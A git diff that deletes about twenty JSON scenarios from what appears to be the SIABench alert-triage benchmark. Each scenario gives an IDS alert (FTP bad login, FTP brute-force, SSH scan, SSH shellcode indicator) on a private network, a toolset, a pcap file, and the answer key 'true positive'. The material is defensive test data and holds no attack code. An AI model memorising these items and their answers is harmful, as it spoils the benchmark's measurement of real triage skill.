a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00080.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00080.json deleted file mode 100644 index 0f92ff299b3ebc42b8be9edff81204f9e7f357be..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00080.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00080", - "alert_type": "True", - "alert_name": "dp_00080" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-04:12:40.376827 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "alert": "01/01-04:12:40.376827 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00152.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00152.json deleted file mode 100644 index f17d33706a3a9c6bf5cb563dc5ee12835463e6fd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00152.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00152", - "alert_type": "True", - "alert_name": "dp_00152" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T04:12:40.424282+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "alert": "1970-01-01T04:12:40.424282+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00153.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00153.json deleted file mode 100644 index bd0913dbd14088b8d513c7f4939301d6029205be..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00153.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00153", - "alert_type": "True", - "alert_name": "dp_00153" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T04:14:39.750744+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:53882", - "alert": "1970-01-01T04:14:39.750744+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:53882", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00195.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00195.json deleted file mode 100644 index 71babd40dfa03606922b31c4f47e3ccb3c02bba7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00195.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00195", - "alert_type": "True", - "alert_name": "dp_00195" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-04:27:42.255992 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:59748", - "alert": "01/01-04:27:42.255992 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:59748", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00214.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00214.json deleted file mode 100644 index ca1709aaa6afb2fc8132de486c0c2e2c0cec0aeb..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00214.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00214", - "alert_type": "True", - "alert_name": "dp_00214" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-05:41:32.117058 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40844", - "alert": "01/02-05:41:32.117058 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40844", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00240.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00240.json deleted file mode 100644 index 3703e593bfe86276b2864a988cbd8f6626aff2b5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00240.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00240", - "alert_type": "True", - "alert_name": "dp_00240" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:42:34.465726+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:50574", - "alert": "1970-01-02T05:42:34.465726+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:50574", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00266.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00266.json deleted file mode 100644 index d8c21a730e8a944311312b96c0699aa6082c546a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00266.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00266", - "alert_type": "True", - "alert_name": "dp_00266" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-05:51:52.799411 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40904", - "alert": "01/02-05:51:52.799411 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40904", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00370.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00370.json deleted file mode 100644 index d66841f768d381d1a104d848afa35090022344ee..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00370.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00370", - "alert_type": "True", - "alert_name": "dp_00370" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-06:03:59.232796 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "alert": "01/02-06:03:59.232796 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00387.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00387.json deleted file mode 100644 index 917dfe954557a9e31a3db6909a1ab45eee37e69b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00387.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00387", - "alert_type": "True", - "alert_name": "dp_00387" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:59:57.116848+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:51172", - "alert": "1970-01-02T05:59:57.116848+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:51172", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00390.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00390.json deleted file mode 100644 index 442080417eee52bc37982cc3dd2a1a9ae0870360..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_00390.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00390", - "alert_type": "True", - "alert_name": "dp_00390" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:03:59.302074+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "alert": "1970-01-02T06:03:59.302074+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06342.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06342.json deleted file mode 100644 index 3e9d02a6da7cef719193ef2779e25fd3760528ba..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06342.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06342", - "alert_type": "True", - "alert_name": "dp_06342" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-05:07:59.206981 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:56366 -> 192.168.1.90:22", - "alert": "01/01-05:07:59.206981 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:56366 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06409.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06409.json deleted file mode 100644 index 96e1d75b89b8f4decfe53cc722c866d4d9266564..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06409.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06409", - "alert_type": "True", - "alert_name": "dp_06409" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:05:14.922057+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:54414 -> 192.168.1.90:22", - "alert": "1970-01-01T05:05:14.922057+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:54414 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06427.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06427.json deleted file mode 100644 index eaec2b29056d36dda6871ac960985e9a354a87e9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06427.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06427", - "alert_type": "True", - "alert_name": "dp_06427" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:07:55.827864+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56324 -> 192.168.1.90:22", - "alert": "1970-01-01T05:07:55.827864+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56324 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06549.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06549.json deleted file mode 100644 index 620c75b83a4d1b921c5f90377311fd2bd9dea73a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06549.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06549", - "alert_type": "True", - "alert_name": "dp_06549" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-06:37:38.618542 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:55958 -> 192.168.1.90:22", - "alert": "01/02-06:37:38.618542 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:55958 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06600.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06600.json deleted file mode 100644 index eb0e690cbb59c486d8bbeaa3fdd8cb11362d277b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06600.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06600", - "alert_type": "True", - "alert_name": "dp_06600" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-06:39:06.350911 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43416 -> 192.168.1.90:22", - "alert": "01/02-06:39:06.350911 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43416 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06629.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06629.json deleted file mode 100644 index ec568345263a9c2abcb267ea4c53af0b4ea71bf8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_06629.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06629", - "alert_type": "True", - "alert_name": "dp_06629" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:36:24.809877+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:38924 -> 192.168.1.90:22", - "alert": "1970-01-02T06:36:24.809877+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:38924 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07250.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07250.json deleted file mode 100644 index ca8d87cb2129c09675808d22f92abdf02be9380a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07250.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07250", - "alert_type": "True", - "alert_name": "dp_07250" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-05:24:25.529313 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43356 -> 192.168.1.90:22", - "alert": "01/01-05:24:25.529313 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43356 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07275.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07275.json deleted file mode 100644 index e67fcac49412ddac146e73d91952dfe0a3750bf6..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07275.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07275", - "alert_type": "True", - "alert_name": "dp_07275" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-05:25:19.286056 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:40442 -> 192.168.1.90:22", - "alert": "01/01-05:25:19.286056 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:40442 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07311.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07311.json deleted file mode 100644 index 2a436cd3ddc39e4a031256c8d3a292a6267667ed..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07311.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07311", - "alert_type": "True", - "alert_name": "dp_07311" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:22:48.419132+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:37614 -> 192.168.1.90:22", - "alert": "1970-01-01T05:22:48.419132+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:37614 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07521.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07521.json deleted file mode 100644 index 5f823092c9b8fe7d8c7660eaffff13417b0c4470..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07521.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07521", - "alert_type": "True", - "alert_name": "dp_07521" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:28:00.377062+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:39634 -> 192.168.1.90:22", - "alert": "1970-01-01T05:28:00.377062+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:39634 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07529.json 